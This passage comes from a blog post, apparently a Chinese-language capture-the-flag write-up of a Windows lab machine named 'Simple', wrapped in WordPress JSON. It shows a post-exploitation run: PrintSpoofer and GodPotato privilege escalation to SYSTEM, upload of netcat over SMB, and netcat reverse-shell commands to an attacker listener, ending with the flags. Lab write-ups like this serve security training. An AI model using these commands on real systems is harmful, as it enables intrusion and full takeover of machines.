data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007924.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408150047989\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">SIMPLE{ASPXT0SH311}<\/code><\/pre>\n<p>\u8fd9\u662f\u5565\u610f\u601d\uff1f\u91cd\u542f\u9776\u673a\u518d\u8bd5\u4e00\u6b21aspx\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007925.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007925.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408150654622\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007926.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007926.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408150931845\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5f39\u56de\u6765\u4e86\uff0c\u6de6\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<p>\u53c2\u8003https:\/\/fuzzysecurity.com\/tutorials\/16.html\u4ee5\u53cahttps:\/\/book.hacktricks.xyz\/windows-hardening\/windows-local-privilege-escalation\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007927.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007927.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408152027719\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007928.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007928.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408152104096\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5github\u6328\u4e2a\u641c\u7d22\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007929.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007929.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408152259491\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6309\u7167\u8fd9\u7bc7blog\u8bf4\u7684\u64cd\u4f5chttps:\/\/medium.com\/@anandnikhil33\/windows-privilege-escalation-token-impersonation-seimpersonateprivilege-364b61017070<\/p>\n<p>\u4f7f\u7528smb\u670d\u52a1\u5668\u8fdb\u884c\u4e0a\u4f20\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007930.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007930.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408194502581\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-css\">PS C:\\inetpub&gt; cd wwwroot\ncd wwwroot\nPS C:\\inetpub\\wwwroot&gt; ls\nls\n\n    Directorio: C:\\inetpub\\wwwroot\n\nMode                LastWriteTime         Length Name                                                                  \n----                -------------         ------ ----                                                                  \nd-----       08\/10\/2023     23:22                03-comming-soon                                                       \nd-----       08\/10\/2023     21:46                aspnet_client                                                         \nd-----       08\/10\/2023     23:14                common-js                                                             \nd-----       08\/10\/2023     23:14                fonts                                                                 \nd-----       08\/10\/2023     23:14                images                                                                \n-a----       08\/04\/2024      8:55            320 hello.aspx                                                            \n-a----       08\/10\/2023     23:26           1481 index.html                                                            \n-a----       08\/04\/2024      9:05          15970 reverse.aspx                                                          \n\nPS C:\\inetpub\\wwwroot&gt; ls\nls\n\n    Directorio: C:\\inetpub\\wwwroot\n\nMode                LastWriteTime         Length Name                                                                  \n----                -------------         ------ ----                                                                  \nd-----       08\/10\/2023     23:22                03-comming-soon                                                       \nd-----       08\/10\/2023     21:46                aspnet_client                                                         \nd-----       08\/10\/2023     23:14                common-js                                                             \nd-----       08\/10\/2023     23:14                fonts                                                                 \nd-----       08\/10\/2023     23:14                images                                                                \n-a----       08\/04\/2024      8:55            320 hello.aspx                                                            \n-a----       08\/10\/2023     23:26           1481 index.html                                                            \n-a----       08\/04\/2024     13:42          27136 PrintSpoofer.exe                                                      \n-a----       08\/04\/2024      9:05          15970 reverse.aspx                                                          \n\nPS C:\\inetpub\\wwwroot&gt; .\/PrintSpoofer.exe -i -c cmd\n.\/PrintSpoofer.exe -i -c cmd\nPS C:\\inetpub\\wwwroot&gt; whoami\nwhoami\niis apppool\\defaultapppool\nPS C:\\inetpub\\wwwroot&gt; cmd\ncmd\nMicrosoft Windows [Versi\ufffdn 10.0.17763.107]\n(c) 2018 Microsoft Corporation. Todos los derechos reservados.\n\nC:\\inetpub\\wwwroot&gt;ls\nls\n&quot;ls&quot; no se reconoce como un comando interno o externo,\nprograma o archivo por lotes ejecutable.\n\nC:\\inetpub\\wwwroot&gt;dir\ndir\n El volumen de la unidad C no tiene etiqueta.\n El n\ufffdmero de serie del volumen es: 26CD-AE41\n\n Directorio de C:\\inetpub\\wwwroot\n\n08\/04\/2024  13:42    &lt;DIR&gt;          .\n08\/04\/2024  13:42    &lt;DIR&gt;          ..\n08\/10\/2023  23:22    &lt;DIR&gt;          03-comming-soon\n08\/10\/2023  21:46    &lt;DIR&gt;          aspnet_client\n08\/10\/2023  23:14    &lt;DIR&gt;          common-js\n08\/10\/2023  23:14    &lt;DIR&gt;          fonts\n08\/04\/2024  08:55               320 hello.aspx\n08\/10\/2023  23:14    &lt;DIR&gt;          images\n08\/10\/2023  23:26             1.481 index.html\n08\/04\/2024  13:42            27.136 PrintSpoofer.exe\n08\/04\/2024  09:05            15.970 reverse.aspx\n               4 archivos         44.907 bytes\n               7 dirs  45.572.870.144 bytes libres\n\nC:\\inetpub\\wwwroot&gt;PrintSpoofer.exe -i -c cmd.exe\nPrintSpoofer.exe -i -c cmd.exe<\/code><\/pre>\n<p>\u4f46\u662f\u6ca1\u5565\u7528\u5904\uff0c\u5c1d\u8bd5\u6362\u4e00\u4e2a\u5de5\u5177<a href=\"https:\/\/github.com\/BeichenDream\/GodPotato\">GodPotato<\/a>\uff1a<\/p>\n<blockquote>\n<p>\u6709\u591a\u4e2a\u7248\u672c\u7684\uff0c\u6211\u8bd5\u4e86\u4e00\u4e2a2\u548c4\u5c31\u51fa\u6765\u4e86\uff0c\u5982\u679c\u90fd\u4e0d\u884c\u7684\u8bdd\u6211\u672a\u5fc5\u4f1a\u8bd5\u4e00\u4e0b3\uff0c\u54c8\u54c8\u54c8<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007931.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007931.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408195320225\" \/><\/div><\/p>\n<pre><code class=\"language-css\">C:\\inetpub\\wwwroot&gt;dir\ndir\n El volumen de la unidad C no tiene etiqueta.\n El n\ufffdmero de serie del volumen es: 26CD-AE41\n\n Directorio de C:\\inetpub\\wwwroot\n\n08\/04\/2024  13:42    &lt;DIR&gt;          .\n08\/04\/2024  13:42    &lt;DIR&gt;          ..\n08\/10\/2023  23:22    &lt;DIR&gt;          03-comming-soon\n08\/10\/2023  21:46    &lt;DIR&gt;          aspnet_client\n08\/10\/2023  23:14    &lt;DIR&gt;          common-js\n08\/10\/2023  23:14    &lt;DIR&gt;          fonts\n08\/04\/2024  08:55               320 hello.aspx\n08\/10\/2023  23:14    &lt;DIR&gt;          images\n08\/10\/2023  23:26             1.481 index.html\n08\/04\/2024  13:42            27.136 PrintSpoofer.exe\n08\/04\/2024  09:05            15.970 reverse.aspx\n               4 archivos         44.907 bytes\n               7 dirs  45.572.870.144 bytes libres\n\nC:\\inetpub\\wwwroot&gt;PrintSpoofer.exe -i -c cmd.exe\nPrintSpoofer.exe -i -c cmd.exe\n\nC:\\inetpub\\wwwroot&gt;dir\ndir\n El volumen de la unidad C no tiene etiqueta.\n El n\ufffdmero de serie del volumen es: 26CD-AE41\n\n Directorio de C:\\inetpub\\wwwroot\n\n08\/04\/2024  13:47    &lt;DIR&gt;          .\n08\/04\/2024  13:47    &lt;DIR&gt;          ..\n08\/10\/2023  23:22    &lt;DIR&gt;          03-comming-soon\n08\/10\/2023  21:46    &lt;DIR&gt;          aspnet_client\n08\/10\/2023  23:14    &lt;DIR&gt;          common-js\n08\/10\/2023  23:14    &lt;DIR&gt;          fonts\n08\/04\/2024  13:47            57.344 GodPotato-NET2.exe\n08\/04\/2024  08:55               320 hello.aspx\n08\/10\/2023  23:14    &lt;DIR&gt;          images\n08\/10\/2023  23:26             1.481 index.html\n08\/04\/2024  13:42            27.136 PrintSpoofer.exe\n08\/04\/2024  09:05            15.970 reverse.aspx\n               5 archivos        102.251 bytes\n               7 dirs  45.572.812.800 bytes libres\n\nC:\\inetpub\\wwwroot&gt;GodPotato-NET2.exe -cmd &quot;cmd \/c whoami&quot;\nGodPotato-NET2.exe -cmd &quot;cmd \/c whoami&quot;\n\nC:\\&quot; no se reconoce como un comando interno o externo,\nprograma o archivo por lotes ejecutable.\n\nC:\\inetpub\\wwwroot&gt;ls\nls\n&quot;ls&quot; no se reconoce como un comando interno o externo,\nprograma o archivo por lotes ejecutable.\n\nC:\\inetpub\\wwwroot&gt;dir\ndir\n El volumen de la unidad C no tiene etiqueta.\n El n\ufffdmero de serie del volumen es: 26CD-AE41\n\n Directorio de C:\\inetpub\\wwwroot\n\n08\/04\/2024  13:49    &lt;DIR&gt;          .\n08\/04\/2024  13:49    &lt;DIR&gt;          ..\n08\/10\/2023  23:22    &lt;DIR&gt;          03-comming-soon\n08\/10\/2023  21:46    &lt;DIR&gt;          aspnet_client\n08\/10\/2023  23:14    &lt;DIR&gt;          common-js\n08\/10\/2023  23:14    &lt;DIR&gt;          fonts\n08\/04\/2024  13:47            57.344 GodPotato-NET2.exe\n08\/04\/2024  13:49            57.344 GodPotato-NET4.exe\n08\/04\/2024  08:55               320 hello.aspx\n08\/10\/2023  23:14    &lt;DIR&gt;          images\n08\/10\/2023  23:26             1.481 index.html\n08\/04\/2024  13:42            27.136 PrintSpoofer.exe\n08\/04\/2024  09:05            15.970 reverse.aspx\n               6 archivos        159.595 bytes\n               7 dirs  45.572.755.456 bytes libres\n\nC:\\inetpub\\wwwroot&gt;GodPotato-NET4.exe -cmd &quot;cmd \/c whoami&quot;\nGodPotato-NET4.exe -cmd &quot;cmd \/c whoami&quot;\n[*] CombaseModule: 0x140709567922176\n[*] DispatchTable: 0x140709570239728\n[*] UseProtseqFunction: 0x140709569615008\n[*] UseProtseqFunctionParamCount: 6\n[*] HookRPC\n[*] Start PipeServer\n[*] CreateNamedPipe \\\\.\\pipe\\42254cd5-fde6-4c69-9a5b-709b17a9aa80\\pipe\\epmapper\n[*] Trigger RPCSS\n[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046\n[*] DCOM obj IPID: 00004402-0330-ffff-5fb3-25e91f749669\n[*] DCOM obj OXID: 0x68660599703e6daf\n[*] DCOM obj OID: 0x9a5eb605185a6c3a\n[*] DCOM obj Flags: 0x281\n[*] DCOM obj PublicRefs: 0x0\n[*] Marshal Object bytes len: 100\n[*] UnMarshal Object\n[*] Pipe Connected!\n[*] CurrentUser: NT AUTHORITY\\Servicio de red\n[*] CurrentsImpersonationLevel: Impersonation\n[*] Start Search System Token\n[*] PID : 764 Token:0x860  User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation\n[*] Find System Token : True\n[*] UnmarshalObject: 0x80070776\n[*] CurrentUser: NT AUTHORITY\\SYSTEM\n[*] process start with pid 1764\nnt authority\\system<\/code><\/pre>\n<p>\u5e78\u798f\u6765\u5f97\u5c31\u662f\u8fd9\u4e48\u7a81\u7136\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff01<\/p>\n<pre><code class=\"language-bash\">GodPotato-NET4.exe -cmd &quot;nc -t -e C:\\Windows\\System32\\cmd.exe 172.20.10.8 4321&quot;<\/code><\/pre>\n<p>\u62a5\u9519\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">C:\\inetpub\\wwwroot&gt;whoami\nwhoami\niis apppool\\defaultapppool\n\nC:\\inetpub\\wwwroot&gt;GodPotato-NET4.exe -cmd &quot;nc -t -e C:\\Windows\\System32\\cmd.exe 172.20.10.8 4321&quot;\nGodPotato-NET4.exe -cmd &quot;nc -t -e C:\\Windows\\System32\\cmd.exe 172.20.10.8 4321&quot;\n[*] CombaseModule: 0x140709567922176\n[*] DispatchTable: 0x140709570239728\n[*] UseProtseqFunction: 0x140709569615008\n[*] UseProtseqFunctionParamCount: 6\n[*] HookRPC\n[*] Start PipeServer\n[*] CreateNamedPipe \\\\.\\pipe\\c855dd94-4606-441d-ba39-05ae24258766\\pipe\\epmapper\n[*] Trigger RPCSS\n[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046\n[*] DCOM obj IPID: 00007c02-00b0-ffff-7897-24954097877e\n[*] DCOM obj OXID: 0xc751c8256ce3cfb8\n[*] DCOM obj OID: 0x5f567f9907eaaa76\n[*] DCOM obj Flags: 0x281\n[*] DCOM obj PublicRefs: 0x0\n[*] Marshal Object bytes len: 100\n[*] UnMarshal Object\n[*] Pipe Connected!\n[*] CurrentUser: NT AUTHORITY\\Servicio de red\n[*] CurrentsImpersonationLevel: Impersonation\n[*] Start Search System Token\n[*] PID : 764 Token:0x860  User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation\n[*] Find System Token : True\n[*] UnmarshalObject: 0x80070776\n[*] CurrentUser: NT AUTHORITY\\SYSTEM\n[!] Cannot create process Win32Error:2<\/code><\/pre>\n<pre><code class=\"language-bash\">GodPotato-NET4.exe -cmd &quot;nc 172.20.10.8 4321 -e c:\\windows\\system32\\cmd.exe &quot;<\/code><\/pre>\n<p>\u5931\u8d25\u3002\u3002\u3002\u96be\u9053\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">C:\\inetpub\\wwwroot&gt;nc\nnc\n&quot;nc&quot; no se reconoce como un comando interno o externo,\nprograma o archivo por lotes ejecutable.<\/code><\/pre>\n<p>\u5fd8\u4e86\u8fd9\u4e00\u832c\u4e86\u3002\u3002\u3002\u4e0a\u4f20\u4e00\u4e2a\uff01<\/p>\n<pre><code class=\"language-css\">C:\\inetpub\\wwwroot&gt;nc\nnc\n&quot;nc&quot; no se reconoce como un comando interno o externo,\nprograma o archivo por lotes ejecutable.\n\nC:\\inetpub\\wwwroot&gt;GodPotato-NET4.exe -cmd &quot;nc64.exe 172.20.10.8 4321 -e c:\\windows\\system32\\cmd.exe &quot;\nGodPotato-NET4.exe -cmd &quot;nc64.exe 172.20.10.8 4321 -e c:\\windows\\system32\\cmd.exe &quot;\n[*] CombaseModule: 0x140709567922176\n[*] DispatchTable: 0x140709570239728\n[*] UseProtseqFunction: 0x140709569615008\n[*] UseProtseqFunctionParamCount: 6\n[*] HookRPC\n[*] Start PipeServer\n[*] CreateNamedPipe \\\\.\\pipe\\d9d49022-4453-4c02-b68c-5274c4ceddc0\\pipe\\epmapper\n[*] Trigger RPCSS\n[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046\n[*] DCOM obj IPID: 00004802-06e4-ffff-a61f-8556657d2194\n[*] DCOM obj OXID: 0xe491845c67a1f886\n[*] DCOM obj OID: 0x3ddde56b1833d4e9\n[*] DCOM obj Flags: 0x281\n[*] DCOM obj PublicRefs: 0x0\n[*] Marshal Object bytes len: 100\n[*] UnMarshal Object\n[*] Pipe Connected!\n[*] CurrentUser: NT AUTHORITY\\Servicio de red\n[*] CurrentsImpersonationLevel: Impersonation\n[*] Start Search System Token\n[*] PID : 764 Token:0x860  User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation\n[*] Find System Token : True\n[*] UnmarshalObject: 0x80070776\n[*] CurrentUser: NT AUTHORITY\\SYSTEM\n[*] process start with pid 1048<\/code><\/pre>\n<pre><code class=\"language-css\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Simple]\n\u2514\u2500$ ls\n20231008.log        GodPotato-NET2.exe  hello.aspx         printspoofer-master  reverse.aspx  user.txt\naspx-reverse-shell  GodPotato-NET4.exe  nc.exe-master.zip  reverse.asp          shell.aspx\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Simple]\n\u2514\u2500$ unzip nc.exe-master.zip      \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Simple]\n\u2514\u2500$ ls\n20231008.log        GodPotato-NET2.exe  hello.aspx     nc.exe-master.zip    reverse.asp   shell.aspx\naspx-reverse-shell  GodPotato-NET4.exe  nc.exe-master  printspoofer-master  reverse.aspx  user.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Simple]\n\u2514\u2500$ cd nc.exe-master \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Simple\/nc.exe-master]\n\u2514\u2500$ ls\ndoexec.c  generic.h  getopt.c  getopt.h  hobbit.txt  license.txt  Makefile  nc64.exe  nc.exe  netcat.c  readme.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Simple\/nc.exe-master]\n\u2514\u2500$ smbclient \/\/172.20.10.4\/WEB -U marcos \nPassword for [WORKGROUP\\marcos]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; put nc64.exe\nputting file nc64.exe as \\nc64.exe (14736.5 kb\/s) (average 14737.0 kb\/s)\nsmb: \\&gt; put nc.exe\nputting file nc.exe as \\nc.exe (3142.6 kb\/s) (average 5461.5 kb\/s)\nsmb: \\&gt; ^C\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Simple\/nc.exe-master]\n\u2514\u2500$ nc -lvnp 4321\nlistening on [any] 4321 ...\nconnect to [172.20.10.8] from (UNKNOWN) [172.20.10.4] 49690\nMicrosoft Windows [Versi\ufffdn 10.0.17763.107]\n(c) 2018 Microsoft Corporation. Todos los derechos reservados.\n\nC:\\inetpub\\wwwroot&gt;whoami\nwhoami\nnt authority\\system\n\nC:\\inetpub\\wwwroot&gt;cd \\Users\\Administrador\\Desktop\ncd \\Users\\Administrador\\Desktop\n\nC:\\Users\\Administrador\\Desktop&gt;dir\ndir\n El volumen de la unidad C no tiene etiqueta.\n El n\ufffdmero de serie del volumen es: 26CD-AE41\n\n Directorio de C:\\Users\\Administrador\\Desktop\n\n26\/09\/2023  15:11    &lt;DIR&gt;          .\n26\/09\/2023  15:11    &lt;DIR&gt;          ..\n09\/10\/2023  00:07                66 root.txt\n               1 archivos             66 bytes\n               2 dirs  45.572.358.144 bytes libres\n\nC:\\Users\\Administrador\\Desktop&gt;type root.txt\ntype root.txt\nSIMPLE{S31MP3R50N4T3PR1V1L363}<\/code><\/pre>\n<p>\u5f97\u5230flag\uff01\uff01\uff01\u4e0d\u5e78\u4e2d\u7684\u4e07\u5e78\uff0c\u5168\u9760\u8fd0\u6c14\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Simple \u597d\u50cf\u662fwindows\u7684\u9776\u573a\uff0c\u4eca\u5929\u8bd5\u8bd5\uff01 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf nmap -sCV -p 1-655 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-517","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/517","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=517"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/517\/revisions"}],"predecessor-version":[{"id":519,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/517\/revisions\/519"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=517"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=517"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=517"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}